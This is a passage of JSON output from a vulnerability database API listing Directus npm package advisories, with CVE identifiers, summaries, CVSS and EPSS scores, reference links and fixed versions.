"http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-39943", "GHSA-mvv8-v4jj-g47j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8vm-nuff-uffc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89728?format=api", "vulnerability_id": "VCID-dcw5-6ct3-b3ev", "summary": "Directus is a real-time API and 
App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents. The searchable columns (numbers & strings) are not checked against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields. Version 11.5.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-30352", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3465", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34647", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3467", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3447", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-30352" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30352", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2025-30352" }, { "reference_url": "https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d", "reference_id": "ac5a9964d9926f20dc063a74cb417dc7bbad676d", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/" } ], "url": "https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d" }, { "reference_url": "https://github.com/advisories/GHSA-7wq3-jr35-275c", "reference_id": "GHSA-7wq3-jr35-275c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7wq3-jr35-275c" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c", "reference_id": "GHSA-7wq3-jr35-275c", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377846?format=api", "purl": "pkg:npm/directus@11.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": 
"VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.5.0" } ], "aliases": [ "CVE-2025-30352", "GHSA-7wq3-jr35-275c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dcw5-6ct3-b3ev" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/166999?format=api", "vulnerability_id": "VCID-eb1b-zvas-muey", "summary": "Directus is a free and open-source data platform for headless content management. The Directus process can be crashed (a denial of service) by an authenticated user who has permission to update the `filename_disk` field on `directus_files`: setting that value to a directory and then requesting the file through the `/assets` endpoint aborts the server process. This vulnerability has been patched and release v9.15.0 contains the fix. Users are advised to upgrade. 
Users unable to upgrade may prevent this problem by making sure no (untrusted) non-admin users have permissions to update the `filename_disk` field on `directus_files`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-36031", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49762", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49768", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49781", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49626", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-36031" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36031", "reference_id": "CVE-2022-36031", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36031" }, { "reference_url": "https://github.com/advisories/GHSA-77qm-wvqq-fg79", "reference_id": "GHSA-77qm-wvqq-fg79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-77qm-wvqq-fg79" }, { "reference_url": 
"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79", "reference_id": "GHSA-77qm-wvqq-fg79", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/26040?format=api", "purl": "pkg:npm/directus@9.15.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { 
"vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0" } ], "aliases": [ "CVE-2022-36031", "GHSA-77qm-wvqq-fg79" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eb1b-zvas-muey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55903?format=api", "vulnerability_id": "VCID-eyv5-91cq-pyf9", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows an unauthenticated attacker to receive the password reset email of a victim user by requesting a reset for a look-alike address that differs from the victim's only in one or more accented characters; the reset link is delivered to the attacker-controlled address and can be used to take over the victim's account. This is because MySQL/MariaDB default to accent-insensitive and case-insensitive string comparisons, so the look-alike address matches the victim's record. 
This vulnerability is fixed in version 10.8.3.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.7008", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.70182", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.70185", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.7017", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27295" }, { "reference_url": "https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919" }, { 
"reference_url": "https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27295", "reference_id": "CVE-2024-27295", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27295" }, { "reference_url": "https://github.com/advisories/GHSA-qw9g-7549-7wg5", "reference_id": "GHSA-qw9g-7549-7wg5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qw9g-7549-7wg5" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5", "reference_id": "GHSA-qw9g-7549-7wg5", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29477?format=api", "purl": "pkg:npm/directus@10.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { 
"vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3" } ], "aliases": [ "CVE-2024-27295", "GHSA-qw9g-7549-7wg5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eyv5-91cq-pyf9" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/210858?format=api", "vulnerability_id": "VCID-fy6n-dp1y-93g5", "summary": "Server-Side Request Forgery in Directus", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-23080", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30184", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.29987", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30181", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.302", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-23080" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23080", "reference_id": "CVE-2022-23080", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": 
"generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23080" }, { "reference_url": "https://www.mend.io/vulnerability-database/CVE-2022-23080", "reference_id": "CVE-2022-23080", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.mend.io/vulnerability-database/CVE-2022-23080" }, { "reference_url": "https://github.com/advisories/GHSA-5h75-pvq4-82c9", "reference_id": "GHSA-5h75-pvq4-82c9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5h75-pvq4-82c9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": 
"VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-23080", "GHSA-5h75-pvq4-82c9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fy6n-dp1y-93g5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71620?format=api", "vulnerability_id": "VCID-ga3s-595f-2keq", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. 
This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35442", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04829", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04832", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0784", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07846", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35442" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35442", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35442" }, { "reference_url": "https://github.com/advisories/GHSA-38hg-ww64-rrwc", "reference_id": "GHSA-38hg-ww64-rrwc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-38hg-ww64-rrwc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc", "reference_id": "GHSA-38hg-ww64-rrwc", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35442", "GHSA-38hg-ww64-rrwc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ga3s-595f-2keq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/124112?format=api", "vulnerability_id": "VCID-gf4m-ad8j-7bbn", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.2.0, when sharing an item, a typical user can specify an arbitrary role. It allows the user to use a higher-privileged role to see fields that otherwise the user should not be able to see. Instances that are impacted are those that use the share feature and have specific roles hierarchy and fields that are not visible for certain roles. 
"Version 11.2.0 contains a patch for the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-24353", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57651", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57767", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57784", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00471", "scoring_system": "epss", "scoring_elements": "0.65161", "published_at": "2026-06-14T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-24353" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24353", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24353" }, { "reference_url": 